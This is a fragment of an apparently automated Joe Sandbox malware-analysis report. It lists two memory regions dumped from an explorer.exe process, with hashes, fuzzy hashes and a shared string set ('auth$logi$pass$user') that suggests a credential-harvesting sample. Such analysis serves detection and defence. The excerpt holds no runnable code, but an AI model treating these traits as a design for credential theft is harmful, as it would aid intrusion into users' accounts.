                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: auth$logi$pass$user
                                            • API String ID: 0-2393853802
                                            • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                            • Instruction ID: 340f3ef78f66bed54a95e1da8ec5dd216987d907d83a7b841c5cc3522bef22b7
                                            • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                            • Instruction Fuzzy Hash: FF21AC31614B0D8BCB45CF9999817DEBBF1FF88354F01561AA40AEB248D7B0E9148BC6
                                            Function 10C0CFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: auth$logi$pass$user
                                            • API String ID: 0-2393853802
                                            • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                            • Instruction ID: 3e7c70f81ce845422252336bff2efd686a04d55ffa6a63495b9a4fdefdf59880
                                            • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                            • Instruction Fuzzy Hash: C821C070614B0D8BCB45DF9998816DEB7E2EF88364F004619E40ADB249DBB1E995CBC2